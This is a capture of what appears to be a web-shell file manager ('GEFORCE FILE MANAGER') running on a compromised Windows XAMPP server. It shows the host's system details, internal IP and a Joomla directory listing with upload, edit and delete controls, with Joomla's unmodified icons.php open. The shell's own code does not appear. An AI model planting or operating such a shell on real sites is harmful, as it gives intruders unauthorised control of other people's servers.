[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
backup
/
alajaji
/
libraries
/
cms
/
html
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 language
SET
[ DEL ]
📄 adminlanguage.php
1,403 B
SET
[ EDIT ]
|
[ DEL ]
📄 behavior.php
32,000 B
SET
[ EDIT ]
|
[ DEL ]
📄 category.php
5,658 B
SET
[ EDIT ]
|
[ DEL ]
📄 contentlanguage.php
1,562 B
SET
[ EDIT ]
|
[ DEL ]
📄 date.php
2,071 B
SET
[ EDIT ]
|
[ DEL ]
📄 debug.php
1,467 B
SET
[ EDIT ]
|
[ DEL ]
📄 email.php
3,735 B
SET
[ EDIT ]
|
[ DEL ]
📄 formbehavior.php
3,840 B
SET
[ EDIT ]
|
[ DEL ]
📄 icons.php
1,545 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.php
3,827 B
SET
[ EDIT ]
|
[ DEL ]
📄 links.php
2,558 B
SET
[ EDIT ]
|
[ DEL ]
📄 number.php
3,571 B
SET
[ EDIT ]
|
[ DEL ]
📄 rules.php
8,244 B
SET
[ EDIT ]
|
[ DEL ]
📄 searchtools.php
4,236 B
SET
[ EDIT ]
|
[ DEL ]
📄 select.php
28,132 B
SET
[ EDIT ]
|
[ DEL ]
📄 string.php
9,427 B
SET
[ EDIT ]
|
[ DEL ]
📄 tag.php
4,673 B
SET
[ EDIT ]
|
[ DEL ]
📄 tel.php
2,176 B
SET
[ EDIT ]
|
[ DEL ]
📄 user.php
1,668 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: icons.php
<?php /** * @package Joomla.Libraries * @subpackage HTML * * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('JPATH_PLATFORM') or die; /** * Utility class for icons. * * @since 2.5 */ abstract class JHtmlIcons { /** * Method to generate html code for a list of buttons * * @param array $buttons Array of buttons * * @return string * * @since 2.5 */ public static function buttons($buttons) { $html = array(); foreach ($buttons as $button) { $html[] = JHtml::_('icons.button', $button); } return implode($html); } /** * Method to generate html code for a list of buttons * * @param array $button Button properties * * @return string * * @since 2.5 */ public static function button($button) { if (isset($button['access'])) { if (is_bool($button['access'])) { if ($button['access'] == false) { return ''; } } else { // Get the user object to verify permissions $user = JFactory::getUser(); // Take each pair of permission, context values. for ($i = 0, $n = count($button['access']); $i < $n; $i += 2) { if (!$user->authorise($button['access'][$i], $button['access'][$i + 1])) { return ''; } } } } // Instantiate a new JLayoutFile instance and render the layout $layout = new JLayoutFile('joomla.quickicons.icon'); return $layout->render($button); } }